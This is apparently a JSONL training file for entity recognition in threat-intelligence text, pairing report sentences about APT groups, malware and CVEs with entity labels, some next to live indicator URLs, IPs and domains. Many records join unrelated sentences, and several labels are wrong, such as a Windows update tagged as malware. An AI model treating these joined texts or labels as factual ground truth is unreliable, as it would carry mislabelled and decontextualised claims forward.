{"text": "Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a later blog .", "spans": {"MALWARE: Cannon": [[60, 66]], "MALWARE: Trojan": [[67, 73]]}, "info": {"id": "cyberner_stix_train_006304", "source": "cyberner_stix_train"}}
{"text": "As soon as this service is started , it creates two processes that take care of connection and disconnection to the C & C server . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"TOOL: Equation Group tools": [[157, 177]], "THREAT_ACTOR: Buckeye": [[181, 188]]}, "info": {"id": "cyberner_stix_train_006305", "source": "cyberner_stix_train"}}
{"text": "However , in one organization almost 500 recipients received a mail , while in two other organizations , more than 100 were selected .", "spans": {}, "info": {"id": "cyberner_stix_train_006306", "source": "cyberner_stix_train"}}
{"text": "The JAR file is the decrypted version of the file tong.luo , which is located in the assets folder . In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": {"THREAT_ACTOR: Emissary Panda": [[319, 333]], "ORGANIZATION: Advanced Threat Research": [[360, 384]], "MALWARE: SYSCON backdoor": [[436, 451]]}, "info": {"id": "cyberner_stix_train_006307", "source": "cyberner_stix_train"}}
{"text": "Using this as the next pivot , we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites .", "spans": {}, "info": {"id": "cyberner_stix_train_006308", "source": "cyberner_stix_train"}}
{"text": "The number to call is received along with the command , as seen in Figure 9 . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": {"ORGANIZATION: Symantec": [[84, 92]], "MALWARE: Filensfer": [[123, 132]], "MALWARE: Buckeye malware": [[284, 299]], "TOOL: (Backdoor.Pirpi)": [[300, 316]], "THREAT_ACTOR: Threat Group-3390": [[319, 336]], "THREAT_ACTOR: TG-3390": [[339, 346]], "THREAT_ACTOR: ,Emissary Panda": [[347, 362]], "THREAT_ACTOR: BRONZE UNION": [[365, 377]], "THREAT_ACTOR: APT27": [[380, 385]], "THREAT_ACTOR: Iron Tiger": [[388, 398]], "THREAT_ACTOR: LuckyMouse": [[401, 411]]}, "info": {"id": "cyberner_stix_train_006309", "source": "cyberner_stix_train"}}
{"text": "Figure 11 : ‘ Agent Smith ’ uses man-in-disk to install the malicious update Technical Analysis – Boot Module The “ boot ” module is basically another “ loader ” module , but this time it ’ s executed in the infected application . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "VULNERABILITY: man-in-disk": [[33, 44]], "MALWARE: Careto": [[231, 237]], "MALWARE: Dexphot": [[380, 387]], "TOOL: process hollowing": [[446, 463]], "SYSTEM: a remote server": [[562, 577]], "MALWARE: NetSupport RAT": [[701, 715]]}, "info": {"id": "cyberner_stix_train_006310", "source": "cyberner_stix_train"}}
{"text": "It sends all of this data to the C2 server using the URL ending with /servlet/AppInfos . The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": {"THREAT_ACTOR: group’s": [[93, 100]], "TOOL: stealing tools": [[161, 175]], "TOOL: document stealers": [[208, 225]], "THREAT_ACTOR: Ke3chang": [[328, 336]], "THREAT_ACTOR: attackers": [[337, 346]], "MALWARE: BS2005": [[397, 403]], "MALWARE: BMW": [[410, 413]], "MALWARE: MyWeb": [[424, 429]]}, "info": {"id": "cyberner_stix_train_006311", "source": "cyberner_stix_train"}}
{"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": {"THREAT_ACTOR: PLATINUM": [[26, 34]], "MALWARE: Spindest": [[244, 252]], "TOOL: C2": [[427, 429]]}, "info": {"id": "cyberner_stix_train_006312", "source": "cyberner_stix_train"}}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "MALWARE: WannaCry": [[161, 169]], "VULNERABILITY: exploit": [[183, 190]], "VULNERABILITY: EternalBlue": [[205, 216]], "THREAT_ACTOR: Shadow Brokers": [[246, 260]]}, "info": {"id": "cyberner_stix_train_006313", "source": "cyberner_stix_train"}}
{"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": {"MALWARE: Documents": [[0, 9]], "VULNERABILITY: Flash exploit": [[19, 32]], "FILEPATH: RoyalDNS malware": [[169, 185]], "FILEPATH: Ketrican": [[192, 200]]}, "info": {"id": "cyberner_stix_train_006314", "source": "cyberner_stix_train"}}
{"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "THREAT_ACTOR: LuckyMouse": [[327, 337]], "ORGANIZATION: employees": [[431, 440]]}, "info": {"id": "cyberner_stix_train_006315", "source": "cyberner_stix_train"}}
{"text": "Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year . As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . Thus , In light of this , Mandiant has used the following approaches to identify potential exploitation of CVE-2023 - 4966 and subsequent session hijacking .", "spans": {"MALWARE: Gooligan": [[34, 42]], "MALWARE: SnapPea": [[69, 76]], "TOOL: WHITEOUT": [[140, 148]], "TOOL: Contopee": [[155, 163]], "THREAT_ACTOR: APT38": [[190, 195]], "ORGANIZATION: bank": [[253, 257]], "ORGANIZATION: Mandiant": [[286, 294]], "VULNERABILITY: CVE-2023 - 4966": [[367, 382]]}, "info": {"id": "cyberner_stix_train_006316", "source": "cyberner_stix_train"}}
{"text": "Tellingly , current virus writers have mastered commercial obfuscators . the United Kingdom had data stolen by members of Emissary Panda . The patched code is located right after the load of hpqhvsei.dll . Additionally , the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still having a PTR record to the domain previously identified .", "spans": {"THREAT_ACTOR: Emissary Panda": [[122, 136]], "FILEPATH: hpqhvsei.dll": [[191, 203]], "SYSTEM: IP address 198.244.135[.]250": [[225, 253]], "SYSTEM: C2 domain prontoposer[.]com": [[284, 311]]}, "info": {"id": "cyberner_stix_train_006317", "source": "cyberner_stix_train"}}
{"text": "This is an interesting anti-sandbox technique , as it requires human interaction prior to the document exhibiting any malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_006318", "source": "cyberner_stix_train"}}
{"text": "The hosting locations seen for some HenBox samples , together with the nature of some embedded apps including : those targeted at extremist groups , those who use VPN or other privacy-enabling apps , and those who speak the Uyghur language , highlights the victim profile the threat actors were seeking to attack . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"MALWARE: HenBox": [[36, 42]], "MALWARE: BalkanRAT malware": [[336, 353]], "THREAT_ACTOR: APT33": [[447, 452]], "FILEPATH: malicious file": [[519, 533]]}, "info": {"id": "cyberner_stix_train_006319", "source": "cyberner_stix_train"}}
{"text": "This tradecraft is thus scalable and available to others even if the malware itself changes .", "spans": {}, "info": {"id": "cyberner_stix_train_006320", "source": "cyberner_stix_train"}}
{"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"MALWARE: Bemstour": [[102, 110]], "TOOL: Python": [[155, 161]], "MALWARE: remote administration tool": [[180, 206]], "MALWARE: RAT": [[209, 212]], "MALWARE: Pupy": [[222, 226]]}, "info": {"id": "cyberner_stix_train_006321", "source": "cyberner_stix_train"}}
{"text": "Despite phishing incidents for Mac devices being rarer than their Windows counterparts , users should still be aware that attackers can target them at any moment .", "spans": {"SYSTEM: Mac": [[31, 34]], "SYSTEM: Windows": [[66, 73]]}, "info": {"id": "cyberner_stix_train_006322", "source": "cyberner_stix_train"}}
{"text": "We also detected it in apps targeted toward specific Middle Eastern demographics . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain . Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol . The software is centrally hosted on that third - party company ’s servers .", "spans": {"SYSTEM: third - party company ’s servers": [[358, 390]]}, "info": {"id": "cyberner_stix_train_006323", "source": "cyberner_stix_train"}}
{"text": "Executable payload exploits local privilege escalation ( CVE-2015-1701 ) to steal System token .", "spans": {"VULNERABILITY: CVE-2015-1701": [[57, 70]]}, "info": {"id": "cyberner_stix_train_006324", "source": "cyberner_stix_train"}}
{"text": "Install a mobile security solution to secure your device from threats . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block . In one exchange on Aug. 16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"THREAT_ACTOR: Cobalt": [[95, 101]], "ORGANIZATION: Ashley Madison ’s director of IT": [[448, 480]]}, "info": {"id": "cyberner_stix_train_006325", "source": "cyberner_stix_train"}}
{"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test4.hta http://comonscar.in ( 82.145.40.46 ) . PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": {"MALWARE: XLoader": [[79, 86]], "SYSTEM: Facebook": [[96, 104]], "SYSTEM: Chrome": [[107, 113]], "ORGANIZATION: FireEye": [[213, 220]], "THREAT_ACTOR: admin@338": [[227, 236]], "VULNERABILITY: Microsoft Office vulnerabilities": [[304, 336]], "TOOL: LOWBALL": [[387, 394]], "FILEPATH: test4.hta": [[397, 406]], "URL: http://comonscar.in": [[407, 426]], "IP_ADDRESS: 82.145.40.46": [[429, 441]], "TOOL: PIEHOP": [[446, 452]]}, "info": {"id": "cyberner_stix_train_006326", "source": "cyberner_stix_train"}}
{"text": "In this case , the attackers hacked a Tibetan activist ’ s account and used it to attack Uyghur activists . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China .", "spans": {"TOOL: InPage software": [[148, 163]], "ORGANIZATION: Unit42": [[218, 224]], "VULNERABILITY: InPage exploits": [[247, 262]], "ORGANIZATION: Kaspersky": [[358, 367]], "THREAT_ACTOR: Night Dragon—as": [[491, 506]]}, "info": {"id": "cyberner_stix_train_006327", "source": "cyberner_stix_train"}}
{"text": "Symantec saw the first evidence of Sowbug group with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Sowbug group": [[35, 47]], "TOOL: Felismus": [[124, 132]], "MALWARE: Windows 10 Creators Update": [[179, 205]], "ORGANIZATION: Windows Defender ATP": [[241, 261]], "ORGANIZATION: SOC personnel": [[280, 293]]}, "info": {"id": "cyberner_stix_train_006328", "source": "cyberner_stix_train"}}
{"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , “ Agent Smith ” has a significant impact upon not only developing countries but also some developed countries where GP is readily available . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": {"SYSTEM: Google Play": [[32, 43]], "MALWARE: Agent Smith": [[76, 87]], "TOOL: InPage software": [[256, 271]], "ORGANIZATION: Unit42": [[326, 332]], "VULNERABILITY: InPage exploits": [[355, 370]], "ORGANIZATION: Kaspersky": [[466, 475]], "TOOL: Loader DLLs": [[562, 573]], "THREAT_ACTOR: attacker": [[710, 718]], "SYSTEM: Microsoft Exchange Server": [[758, 783]]}, "info": {"id": "cyberner_stix_train_006329", "source": "cyberner_stix_train"}}
{"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network . Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time . The connection to the Lazarus group was obvious by inspecting the tools , strategies , and methods already linked to the North Korean actor .", "spans": {"THREAT_ACTOR: APT10": [[116, 121]], "TOOL: reverse shell": [[136, 149]], "TOOL: RDP": [[153, 156]], "THREAT_ACTOR: actor": [[197, 202]], "ORGANIZATION: Kaspersky": [[301, 310]], "TOOL: ASUS Live Update": [[373, 389]], "THREAT_ACTOR: the Lazarus group": [[432, 449]], "THREAT_ACTOR: inspecting the tools , strategies , and methods": [[465, 512]], "THREAT_ACTOR: the North Korean actor": [[531, 553]]}, "info": {"id": "cyberner_stix_train_006330", "source": "cyberner_stix_train"}}
{"text": "We ’ve had lots of experience with both of these actors attempting to target our customers in the past and know them well .", "spans": {}, "info": {"id": "cyberner_stix_train_006331", "source": "cyberner_stix_train"}}
{"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[0, 13]], "TOOL: GandCrab ransomware": [[34, 53]], "ORGANIZATION: technology": [[202, 212]], "ORGANIZATION: internet firms": [[217, 231]]}, "info": {"id": "cyberner_stix_train_006332", "source": "cyberner_stix_train"}}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "ORGANIZATION: DHS": [[133, 136]]}, "info": {"id": "cyberner_stix_train_006333", "source": "cyberner_stix_train"}}
{"text": "Like CORESHELL , one of the beacons includes a process listing from the victim host .", "spans": {"MALWARE: CORESHELL": [[5, 14]]}, "info": {"id": "cyberner_stix_train_006334", "source": "cyberner_stix_train"}}
{"text": "WICKED PANDA has also targeted chemical and think tank sectors around the world . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"ORGANIZATION: chemical": [[31, 39]], "ORGANIZATION: think tank": [[44, 54]], "THREAT_ACTOR: APT12": [[113, 118]], "MALWARE: HIGHTIDE": [[147, 155]], "TOOL: Microsoft Word": [[164, 178]], "FILEPATH: .doc": [[181, 185]], "VULNERABILITY: CVE-2012-0158": [[211, 224]]}, "info": {"id": "cyberner_stix_train_006335", "source": "cyberner_stix_train"}}
{"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Campaign victims were identified by using Whois records and open source research . As a result , we decided to call this variant FakeSG .", "spans": {"ORGANIZATION: Google": [[42, 48]], "SYSTEM: GooglePlay": [[59, 69]], "SYSTEM: Flash": [[73, 78]], "TOOL: Winnti installer": [[125, 141]], "TOOL: Whois": [[304, 309]], "MALWARE: FakeSG": [[391, 397]]}, "info": {"id": "cyberner_stix_train_006336", "source": "cyberner_stix_train"}}
{"text": "The event handlers call functions with the following names , which includes an incrementing number that represents the order in which the functions are called : onload1 , onload2 , onload3 , onload5 .", "spans": {}, "info": {"id": "cyberner_stix_train_006337", "source": "cyberner_stix_train"}}
{"text": "It ’ s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps . Winnti hackers also penetrated the BASF and Siemens networks . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": {"MALWARE: HenBox": [[53, 59]], "THREAT_ACTOR: Winnti": [[136, 142]], "ORGANIZATION: BASF": [[171, 175]], "ORGANIZATION: Siemens": [[180, 187]], "ORGANIZATION: networks": [[188, 196]], "ORGANIZATION: media organizations": [[277, 296]], "THREAT_ACTOR: APT16": [[340, 345]]}, "info": {"id": "cyberner_stix_train_006338", "source": "cyberner_stix_train"}}
{"text": "In 2013 , both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations . To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"ORGANIZATION: COSEINC": [[15, 22]], "ORGANIZATION: FireEye": [[27, 34]], "TOOL: Bisonal": [[58, 65]], "MALWARE: Carbanak": [[170, 178]], "MALWARE: Ammy Admin": [[273, 283]], "MALWARE: Team Viewer": [[288, 299]]}, "info": {"id": "cyberner_stix_train_006339", "source": "cyberner_stix_train"}}
{"text": "Configure Group Policy to restrict all users to only one login session , where possible .", "spans": {}, "info": {"id": "cyberner_stix_train_006340", "source": "cyberner_stix_train"}}
{"text": "The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: FIN7": [[36, 40]], "ORGANIZATION: various companies": [[74, 91]], "ORGANIZATION: financial": [[109, 118]], "MALWARE: NetTraveler": [[172, 183]], "VULNERABILITY: exploit": [[197, 204]], "VULNERABILITY: CVE-2012-0158": [[205, 218]], "MALWARE: NetTraveler Trojan": [[230, 248]]}, "info": {"id": "cyberner_stix_train_006341", "source": "cyberner_stix_train"}}
{"text": "No matter what button is pressed , the window stays on top of all other windows . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group . , A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: Gorgon Group": [[94, 106], [219, 231]], "TOOL: infrastructure utilization": [[148, 174]], "TOOL: standardization": [[179, 194]], "ORGANIZATION: CrowdStrike incident responders": [[390, 421]], "THREAT_ACTOR: attacker": [[550, 558]], "TOOL: Remote PowerShell": [[569, 586]]}, "info": {"id": "cyberner_stix_train_006342", "source": "cyberner_stix_train"}}
{"text": "We also believe the tasking to have been temporary , because we have not observed any further similar targeting from the Dukes after the spring of 2014 .", "spans": {"THREAT_ACTOR: Dukes": [[121, 126]]}, "info": {"id": "cyberner_stix_train_006343", "source": "cyberner_stix_train"}}
{"text": "The serialization assigns unique IDs for serializable objects types .", "spans": {}, "info": {"id": "cyberner_stix_train_006344", "source": "cyberner_stix_train"}}
{"text": "Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_006345", "source": "cyberner_stix_train"}}
{"text": "The final APK is downloaded from a different URL that is currently down , we assume that the apk purpose is overlaying ads on the screen , we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"TOOL: JHUHUGIT": [[294, 302]], "VULNERABILITY: Java zero-day": [[400, 413]], "VULNERABILITY: CVE-2015-2590": [[416, 429]], "ORGANIZATION: Palo Alto Networks Unit 42": [[451, 477]], "FILEPATH: malicious files": [[525, 540]], "ORGANIZATION: government": [[606, 616]], "ORGANIZATION: MalwareBytes": [[641, 653]]}, "info": {"id": "cyberner_stix_train_006346", "source": "cyberner_stix_train"}}
{"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162.250.145.234 mynetwork.ddns.net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": {"TOOL: RATANKBA": [[175, 183]], "THREAT_ACTOR: Lazarus": [[214, 221]], "THREAT_ACTOR: APT33": [[234, 239]], "IP_ADDRESS: 162.250.145.234": [[242, 257]], "DOMAIN: mynetwork.ddns.net": [[258, 276]], "THREAT_ACTOR: Cuba": [[296, 300]]}, "info": {"id": "cyberner_stix_train_006347", "source": "cyberner_stix_train"}}
{"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]], "ORGANIZATION: email communications": [[68, 88]], "MALWARE: Infy": [[195, 199]], "ORGANIZATION: development agencies": [[371, 391]]}, "info": {"id": "cyberner_stix_train_006348", "source": "cyberner_stix_train"}}
{"text": "Adobe Flash Player exploit . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[0, 26]], "THREAT_ACTOR: APT40": [[69, 74]], "TOOL: emails": [[139, 145]], "MALWARE: Gh0st RAT trojan": [[185, 201]]}, "info": {"id": "cyberner_stix_train_006349", "source": "cyberner_stix_train"}}
{"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT34": [[35, 40]], "VULNERABILITY: vulnerability": [[83, 96]], "ORGANIZATION: government organization": [[109, 132]], "ORGANIZATION: Symantec": [[160, 168]], "FILEPATH: Filensfer": [[199, 208]], "FILEPATH: Buckeye malware": [[360, 375]], "MALWARE: (Backdoor.Pirpi)": [[376, 392]]}, "info": {"id": "cyberner_stix_train_006350", "source": "cyberner_stix_train"}}
{"text": "It 's restarted in the next cycle independently based on if WhatsApp is running . Callisto Group appears to be intelligence gathering related to European foreign and security policy . If you compare the HTTP GET request from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": {"SYSTEM: WhatsApp": [[60, 68]], "MALWARE: RIPTIDE": [[229, 236]], "MALWARE: HIGHTIDE": [[278, 286]], "TOOL: Uniform Resource Identifier": [[402, 429]], "TOOL: URI": [[432, 435]], "MALWARE: WellMail": [[440, 448]]}, "info": {"id": "cyberner_stix_train_006351", "source": "cyberner_stix_train"}}
{"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity change , unlocking the phone , elapsed time interval , and others . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA . ZIP structure was not considered.) Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . That is very concerning to us , however , there are a couple of things that end users can look out for : Although zero - click exploits do exist , they 're not very common .", "spans": {"ORGANIZATION: U.S. Government": [[258, 273]], "THREAT_ACTOR: HIDDEN COBRA": [[347, 359]], "TOOL: PowerArchiver 2019": [[428, 446]], "TOOL: WinRar": [[449, 455]], "TOOL: 7Zip": [[462, 466]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[515, 549]], "VULNERABILITY: zero - click exploits": [[666, 687]]}, "info": {"id": "cyberner_stix_train_006352", "source": "cyberner_stix_train"}}
{"text": "] today svc [ . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter . The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL : We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": {"TOOL: ShimRat": [[78, 85]], "TOOL: SimRatReporter": [[90, 104]], "THREAT_ACTOR: web server process chains": [[309, 334]]}, "info": {"id": "cyberner_stix_train_006354", "source": "cyberner_stix_train"}}
{"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution ( RCE ) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95], [189, 202]], "THREAT_ACTOR: groups": [[169, 175]], "ORGANIZATION: Microsoft": [[224, 233]], "TOOL: Equation Editor Remote Code Execution": [[234, 271]], "TOOL: RCE": [[274, 277]]}, "info": {"id": "cyberner_stix_train_006355", "source": "cyberner_stix_train"}}
{"text": "Bart ransomware appeared for exactly one day on June 24 , 2016 .", "spans": {"MALWARE: Bart": [[0, 4]]}, "info": {"id": "cyberner_stix_train_006356", "source": "cyberner_stix_train"}}
{"text": "It is an invaluable source of intelligence about a given campaign .. The following snippet shows the location within the Trojan where it uses SQLite database commands to store and recall command-and-control addresses : Backdoor Commands The Red Alert code also contains an embedded list of commands the botmaster can send to the bot . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 . all ANEL samples whose version is 5.3.0 or later are obfuscated with opaque predicates and control flow flattening . The first it Uses and APIs To test for a Debugger attached or Sandbox environment by making a call to with Flag specified , then call to retrieve the addresses of the allocated pages that has been written to since the allocation or the writetrack state has been reset .", "spans": {"MALWARE: Red Alert code": [[241, 255]], "THREAT_ACTOR: group": [[339, 344]], "MALWARE: ANEL": [[478, 482]], "SYSTEM: Sandbox environment": [[653, 672]]}, "info": {"id": "cyberner_stix_train_006357", "source": "cyberner_stix_train"}}
{"text": "While most of these organizations were based in Singapore , some were multinational organizations with a presence in Singapore . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites .", "spans": {"TOOL: NSA": [[215, 218]], "VULNERABILITY: exploits": [[219, 227]]}, "info": {"id": "cyberner_stix_train_006358", "source": "cyberner_stix_train"}}
{"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 . Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province . ShadowHammer : asushotfix.com . We expect KillNet and its affiliates to continue conducting distributed denial - of - service ( DDoS ) and hack - and - leak operations intended to disrupt government and critical infrastructure functions in countries providing financial , economic , diplomatic or military support to Ukraine .", "spans": {"SYSTEM: Google API": [[41, 51]], "SYSTEM: Android": [[74, 81]], "THREAT_ACTOR: Moafee group": [[142, 154]], "THREAT_ACTOR: DragonOK": [[169, 177]], "TOOL: HTRAN": [[186, 191]], "THREAT_ACTOR: ShadowHammer": [[297, 309]], "URL: asushotfix.com": [[312, 326]]}, "info": {"id": "cyberner_stix_train_006359", "source": "cyberner_stix_train"}}
{"text": "We end this section with a discussion on tools related to FakeM and used by Scarlet Mimic . We concluded that Lazarus Group was responsible for WannaCry , a destructive attack in May that targeted Microsoft customers .", "spans": {"TOOL: FakeM": [[58, 63]], "THREAT_ACTOR: Scarlet Mimic": [[76, 89]], "THREAT_ACTOR: Lazarus Group": [[110, 123]], "MALWARE: WannaCry": [[144, 152]], "ORGANIZATION: Microsoft customers": [[197, 216]]}, "info": {"id": "cyberner_stix_train_006360", "source": "cyberner_stix_train"}}
